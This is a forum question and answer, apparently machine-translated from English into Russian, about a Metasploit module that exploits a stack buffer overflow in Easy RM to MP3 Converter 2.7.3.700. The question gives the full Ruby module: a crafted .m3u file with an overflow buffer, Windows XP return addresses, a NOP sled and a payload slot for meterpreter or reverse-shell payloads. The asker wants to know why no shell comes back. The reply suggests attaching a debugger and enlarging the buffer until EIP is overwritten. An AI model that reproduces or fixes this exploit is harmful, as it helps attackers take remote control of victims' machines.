Проблемы с модулем эксплойта metasploit «Easyrmtomp3»

Question

! [Введите описание изображения здесь] [1] Я начал изучать эксплойт, записывая некоторое время назад и создавая несколько эксплойтов. Один из них был простым преобразователем rm в mp3, и он работал очень хорошо. Однако теперь я подумал о преобразовании моих эксплойтов в модули metasploit и последовал за шагами, приведенными в ряде статей. Однако единственной ошибкой, с которой я столкнулся, является то, что полезная нагрузка не работает. В конечном счете, я прибег к поиску онлайн-подобных модулей и нашел тот, который определенно должен работать. Тем не менее, я не возвращаю сессию измерителя или оболочку при использовании полезной нагрузки измерителя. После внесения некоторых изменений, вот что я использовал:

require 'msf/core' 

class Metasploit3 < Msf::Exploit::Remote 
    Rank = GoodRanking 

    include Msf::Exploit::FILEFORMAT 

    def initialize(info = {}) 
     super(update_info(info, 
      'Name' => 'Easy RM to MP3 Converter (2.7.3.700) Stack Buffer Overflow', 
     'Description' => %q{ 
       This module exploits a stack buffer overflow in versions 2.7.3.700 
       creating a specially crafted .m3u8 file, an attacker may be able 
       to execute arbitrary code. 
     }, 
      'License' => MSF_LICENSE, 
      'Author' => 
       [ 
       'Crazy_Hacker', # Original 
     'buzz', 
       ], 
      'Version' => 'Version 1', 
      'References' => 
       [ 
        [ 'URL', 'http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt' ], 
       ], 
      'DefaultOptions' => 
       { 
        'EXITFUNC' => 'process', 
       }, 
      'Payload' => 
       { 
        'Space' => 1000, 
        'BadChars' => "\x00\x0a", 
        'StackAdjustment' => -3500, 
       }, 
      'Platform' => 'win', 
      'Targets' => 
       [ 

        [ 'Windows XP SP2 (En)', { 'Ret' => 0x01A13F01} ], # Universal Address (MSRMCcodec02.dll) 
        [ 'Windows XP SP3 (Fr)', { 'Ret' => 0x01AAF23A} ], # FFE4 ,JMP, ESP from (MSRMCcodec02.dll) 
        [ 'Windows XP (Universal)', { 'Ret' => 0x773D4540} ], # JMP ESP in (SHELL32.DLL) 
       ], 
      'Privileged' => false, 
      'DefaultTarget' => 1)) 

     register_options(
      [ 
       OptString.new('FILENAME', [ false, 'The file name.', 'buzz.m3u']), 
      ], self.class) 
    end 


    def exploit 

     sploit ="A"*26068 # rand_text_alphanumeric(26068) # Buffer Overflow 
     sploit << [target.ret].pack('V') 
     sploit << "\x90" * 30 # nopsled 
     sploit << payload.encoded 
     sploit << "B"*1000 
     buzz= sploit 
     print_status("Creating '#{datastore['FILENAME']}' file ...") 
     file_create(buzz) 

    end 

end 

Я опробовал ряд полезных нагрузок: meterpreter/reverse_tcp, shell/reverse_tcp, e.t.c., но никто не похоже на работу. Любые решения?

Answer 1

Вы также должны предоставить более подробную информацию об используемой ОС и параметрах, которые вы предоставили для запуска модуля.

Как вы можете видеть, указатель на Ret отличается в зависимости от ОС.

Добавили ли вы отладчик, чтобы узнать, что происходит в приложении? Из того, что я могу видеть и знать о подвиге, что ваша строка Fuzzing не кажется, подходит для буфера

sploit = ​​«А» * 26068

Это должно быть больше, чем это. Прикрепите отладчик и посмотрите, был ли перезаписан EIP.

С уважением, T0X1C